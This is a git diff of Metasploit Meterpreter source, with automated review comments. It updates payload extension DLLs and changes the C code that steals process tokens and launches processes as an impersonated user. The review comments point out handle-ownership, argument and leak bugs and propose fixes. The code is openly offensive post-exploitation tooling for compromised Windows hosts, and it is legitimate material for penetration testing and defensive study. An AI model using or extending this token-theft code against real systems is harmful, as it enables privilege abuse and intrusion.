diff --git a/data/meterpreter/elevator.dll b/data/meterpreter/elevator.dll
index 92adc03f07..f3645b5611 100644
Binary files a/data/meterpreter/elevator.dll and b/data/meterpreter/elevator.dll differ
diff --git a/data/meterpreter/elevator.x64.dll b/data/meterpreter/elevator.x64.dll
index 3366b65c5d..09fcee806a 100644
Binary files a/data/meterpreter/elevator.x64.dll and b/data/meterpreter/elevator.x64.dll differ
diff --git a/data/meterpreter/ext_server_espia.dll b/data/meterpreter/ext_server_espia.dll
index d24b4ef2b7..519e022b32 100644
Binary files a/data/meterpreter/ext_server_espia.dll and b/data/meterpreter/ext_server_espia.dll differ
diff --git a/data/meterpreter/ext_server_espia.x64.dll b/data/meterpreter/ext_server_espia.x64.dll
index 955f88baef..3c3918d92e 100644
Binary files a/data/meterpreter/ext_server_espia.x64.dll and b/data/meterpreter/ext_server_espia.x64.dll differ
diff --git a/data/meterpreter/ext_server_incognito.dll b/data/meterpreter/ext_server_incognito.dll
index 9077d546ed..39416953ea 100755
Binary files a/data/meterpreter/ext_server_incognito.dll and b/data/meterpreter/ext_server_incognito.dll differ
diff --git a/data/meterpreter/ext_server_incognito.x64.dll b/data/meterpreter/ext_server_incognito.x64.dll
index a4df172081..030dcb0e95 100644
Binary files a/data/meterpreter/ext_server_incognito.x64.dll and b/data/meterpreter/ext_server_incognito.x64.dll differ
diff --git a/data/meterpreter/ext_server_priv.dll b/data/meterpreter/ext_server_priv.dll
index 27a1df1a13..d5171f6074 100755
Binary files a/data/meterpreter/ext_server_priv.dll and b/data/meterpreter/ext_server_priv.dll differ
diff --git a/data/meterpreter/ext_server_priv.x64.dll b/data/meterpreter/ext_server_priv.x64.dll
index 11616b8f99..410134cf79 100644
Binary files a/data/meterpreter/ext_server_priv.x64.dll and b/data/meterpreter/ext_server_priv.x64.dll differ
diff --git a/data/meterpreter/ext_server_railgun.dll b/data/meterpreter/ext_server_railgun.dll
index b319241bb7..7908a561bc 100755
Binary files a/data/meterpreter/ext_server_railgun.dll and b/data/meterpreter/ext_server_railgun.dll differ
diff --git a/data/meterpreter/ext_server_sniffer.dll b/data/meterpreter/ext_server_sniffer.dll
index 1dd2cf55bd..06b347e128 100644
Binary files a/data/meterpreter/ext_server_sniffer.dll and b/data/meterpreter/ext_server_sniffer.dll differ
diff --git a/data/meterpreter/ext_server_stdapi.dll b/data/meterpreter/ext_server_stdapi.dll
index a7b2f4d3b0..06ab508ccb 100755
Binary files a/data/meterpreter/ext_server_stdapi.dll and b/data/meterpreter/ext_server_stdapi.dll differ
diff --git a/data/meterpreter/ext_server_stdapi.x64.dll b/data/meterpreter/ext_server_stdapi.x64.dll
index 2b79020dc9..062bd45685 100644
Binary files a/data/meterpreter/ext_server_stdapi.x64.dll and b/data/meterpreter/ext_server_stdapi.x64.dll differ
diff --git a/data/meterpreter/metsrv.dll b/data/meterpreter/metsrv.dll
index ac4aa10623..cdbe467b9e 100755
Binary files a/data/meterpreter/metsrv.dll and b/data/meterpreter/metsrv.dll differ
diff --git a/data/meterpreter/metsrv.x64.dll b/data/meterpreter/metsrv.x64.dll
index 129af2aeed..1860e84c37 100644
Binary files a/data/meterpreter/metsrv.x64.dll and b/data/meterpreter/metsrv.x64.dll differ
diff --git a/data/meterpreter/screenshot.dll b/data/meterpreter/screenshot.dll
index ccc6a9252c..bfb8b04137 100644
Binary files a/data/meterpreter/screenshot.dll and b/data/meterpreter/screenshot.dll differ
diff --git a/data/meterpreter/screenshot.x64.dll b/data/meterpreter/screenshot.x64.dll
index 49ef867896..1b24fa4f30 100644
Binary files a/data/meterpreter/screenshot.x64.dll and b/data/meterpreter/screenshot.x64.dll differ
diff --git a/external/source/meterpreter/source/extensions/stdapi/server/sys/config/config.c b/external/source/meterpreter/source/extensions/stdapi/server/sys/config/config.c
index 3de5c2023d..450686a917 100644
--- a/external/source/meterpreter/source/extensions/stdapi/server/sys/config/config.c
+++ b/external/source/meterpreter/source/extensions/stdapi/server/sys/config/config.c
@@ -219,7 +219,7 @@ DWORD request_sys_config_steal_token(Remote *remote, Packet *packet)
 break;
 }
- if(! OpenProcessToken(handle, TOKEN_QUERY|TOKEN_DUPLICATE|TOKEN_IMPERSONATE, &token)){
+ if(! OpenProcessToken(handle, TOKEN_ALL_ACCESS, &token)){
 res = GetLastError();
 dprintf("[STEAL-TOKEN] Failed to open process token for %d (%u)", pid, res);
 break;
diff --git a/external/source/meterpreter/source/extensions/stdapi/server/sys/process/process.c b/external/source/meterpreter/source/extensions/stdapi/server/sys/process/process.c
index 1366cc1ccd..9a2154e960 100644
--- a/external/source/meterpreter/source/extensions/stdapi/server/sys/process/process.c
+++ b/external/source/meterpreter/source/extensions/stdapi/server/sys/process/process.c
@@ -3,6 +3,10 @@
 #include "./../session.h"
 #include "in-mem-exe.h" /* include skapetastic in-mem exe exec */
+
+typedef BOOL (STDMETHODCALLTYPE FAR * LPFNCREATEENVIRONMENTBLOCK)( LPVOID *lpEnvironment, HANDLE hToken, BOOL bInherit );
+typedef BOOL (STDMETHODCALLTYPE FAR * LPFNDESTROYENVIRONMENTBLOCK) ( LPVOID lpEnvironment );
+
 /*
  * Attaches to the supplied process identifier. If no process identifier is
  * supplied, the handle for the current process is returned to the requestor.
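Review bot: Requesting TOKEN_ALL_ACCESS in the OpenProcessToken call is wider than anything downstream appears to need — DuplicateTokenEx requires only TOKEN_DUPLICATE on the source token, and the previous mask already carried TOKEN_QUERY|TOKEN_DUPLICATE|TOKEN_IMPERSONATE — so a target token whose DACL grants those three rights but not WRITE_DAC, WRITE_OWNER or TOKEN_ADJUST_PRIVILEGES now fails a steal that used to succeed. If some later consumer of the stored token (not visible in this hunk) genuinely needs a broader right, fall back to the narrow mask rather than failing outright: `if(! OpenProcessToken(handle, TOKEN_ALL_ACCESS, &token) && ! OpenProcessToken(handle, TOKEN_QUERY|TOKEN_DUPLICATE|TOKEN_IMPERSONATE, &token)){`. Either way the failure dprintf should name the access mask that was refused so an operator can tell a token DACL denial from a missing privilege. request_sys_config_steal_token starts and ends outside this hunk.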
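Review bot: The two function-pointer typedefs are spelled `STDMETHODCALLTYPE FAR`, a COM/16-bit-era form, while the userenv.h prototypes they mirror are declared `WINAPI`; on x86 both resolve to __stdcall, but `typedef BOOL (WINAPI *LPFNCREATEENVIRONMENTBLOCK)(LPVOID *lpEnvironment, HANDLE hToken, BOOL bInherit);` says what is meant and drops the obsolete `FAR`. A one-line comment on why userenv.dll is resolved at run time instead of linked (presumably to avoid a hard import on the extension — the hunk does not say) would help the next reader, e.g. `// Resolved with GetProcAddress so the extension takes no hard import on userenv.dll`. The parameter lists must stay exactly as documented, since a mismatch in a GetProcAddress-resolved signature is only discovered when the call corrupts the stack.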
@@ -95,6 +99,10 @@ DWORD request_sys_process_execute(Remote *remote, Packet *packet)
 HANDLE token, pToken;
 char * cpDesktop = NULL;
 DWORD session = 0;
+ LPVOID pEnvironment = NULL;
+ LPFNCREATEENVIRONMENTBLOCK lpfnCreateEnvironmentBlock = NULL;
+ LPFNDESTROYENVIRONMENTBLOCK lpfnDestroyEnvironmentBlock = NULL;
+ HMODULE hUserEnvLib = NULL;
 dprintf( "[PROCESS] request_sys_process_execute" );
@@ -246,10 +254,13 @@ DWORD request_sys_process_execute(Remote *remote, Packet *packet)
 if (flags & PROCESS_EXECUTE_FLAG_USE_THREAD_TOKEN)
 {
- // If there is a thread token use that, otherwise use current process token
- if (!OpenThreadToken(GetCurrentThread(), TOKEN_ALL_ACCESS, TRUE, &token))
+ // If there is an impersonated token stored, use that one first, otherwise
+ // try to grab the current thread token, then the process token
+ if (remote->hThreadToken)
+ token = remote->hThreadToken;
+ else if (!OpenThreadToken(GetCurrentThread(), TOKEN_ALL_ACCESS, TRUE, &token))
 OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &token);
-
+
 // Duplicate to make primary token (try delegation first)
 if (!DuplicateTokenEx(token, TOKEN_ALL_ACCESS, NULL, SecurityDelegation, TokenPrimary, &pToken))
 if (!DuplicateTokenEx(token, TOKEN_ALL_ACCESS, NULL, SecurityImpersonation, TokenPrimary, &pToken))
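Review bot: `token = remote->hThreadToken;` makes `token` alias a handle the session keeps, but the rest of this branch treats `token` as one it owns (the other two arms fill it from OpenThreadToken/OpenProcessToken): if the function's cleanup, which lies outside this hunk, does `CloseHandle(token)` as those arms require, it now closes the stored impersonation token and every later execute with PROCESS_EXECUTE_FLAG_USE_THREAD_TOKEN runs against a closed or recycled handle. Either duplicate the stored handle into `token` (`DuplicateHandle(GetCurrentProcess(), remote->hThreadToken, GetCurrentProcess(), &token, 0, FALSE, DUPLICATE_SAME_ACCESS)`) so the existing close stays correct, or record that `token` is borrowed and skip the close for that case. Separately, the `OpenProcessToken(GetCurrentProcess(), ...)` fallback result is still unchecked, and `token` is declared without an initialiser in the first hunk, so on failure an indeterminate HANDLE reaches DuplicateTokenEx; `if (!OpenProcessToken(...)) { result = GetLastError(); break; }` would surface that. request_sys_process_execute starts and ends outside this hunk.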
@@ -258,12 +269,26 @@ DWORD request_sys_process_execute(Remote *remote, Packet *packet)
 break;
 }
+ hUserEnvLib = LoadLibrary("userenv.dll");
+ if ( NULL != hUserEnvLib ) {
+ lpfnCreateEnvironmentBlock = (LPFNCREATEENVIRONMENTBLOCK) GetProcAddress( hUserEnvLib, "CreateEnvironmentBlock" );
+ lpfnDestroyEnvironmentBlock = (LPFNDESTROYENVIRONMENTBLOCK) GetProcAddress( hUserEnvLib, "DestroyEnvironmentBlock" );
+ if (lpfnCreateEnvironmentBlock && lpfnCreateEnvironmentBlock( &pEnvironment, pToken, FALSE)) {
+ createFlags |= CREATE_UNICODE_ENVIRONMENT;
+ } else {
+ pEnvironment = NULL;
+ }
+ }
+
 // Try to execute the process with duplicated token
- if (!CreateProcessAsUser(pToken, NULL, commandLine, NULL, NULL, inherit, createFlags, NULL, NULL, &si, &pi))
+ if (!CreateProcessAsUser(pToken, NULL, commandLine, NULL, NULL, inherit, createFlags, pEnvironment, NULL, &si, &pi))
 {
 result = GetLastError();
 break;
 }
+
+ if (lpfnDestroyEnvironmentBlock && (NULL != pEnvironment)) lpfnDestroyEnvironmentBlock(&pEnvironment);
+ if ( NULL != hUserEnvLib ) FreeLibrary( hUserEnvLib );
 }
 else if( flags & PROCESS_EXECUTE_FLAG_SESSION )
 {
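Review bot: `lpfnDestroyEnvironmentBlock(&pEnvironment)` passes the address of the local, but the typedef in the first hunk (and DestroyEnvironmentBlock itself) takes the block pointer by value, so the call hands a stack address to a routine that expects the block it allocated; C converts `LPVOID *` to `LPVOID` silently, so no compiler warning catches it. The call must be `lpfnDestroyEnvironmentBlock(pEnvironment);`. Second, both cleanup lines sit after the `break` in the CreateProcessAsUser failure branch, so on every failed launch the environment block and the userenv.dll reference leak, and once the cleanup is moved ahead of the break the error code has to be captured before those calls can overwrite it. The rewrite below does both, assuming `result` is initialised to ERROR_SUCCESS as the existing `result = GetLastError(); break;` pattern implies (its declaration is outside the hunk); request_sys_process_execute starts and ends outside this hunk.
```c
/* … unchanged: LoadLibrary("userenv.dll") / CreateEnvironmentBlock setup … */

// Try to execute the process with duplicated token.
// Record the failure here; the cleanup calls below may overwrite GetLastError().
if (!CreateProcessAsUser(pToken, NULL, commandLine, NULL, NULL, inherit, createFlags, pEnvironment, NULL, &si, &pi))
    result = GetLastError();

// Release the environment block and userenv.dll on both the success and failure paths.
// DestroyEnvironmentBlock takes the block pointer itself, not its address.
if (lpfnDestroyEnvironmentBlock && (NULL != pEnvironment)) lpfnDestroyEnvironmentBlock(pEnvironment);
if (NULL != hUserEnvLib) FreeLibrary(hUserEnvLib);

if (result != ERROR_SUCCESS)
    break;
```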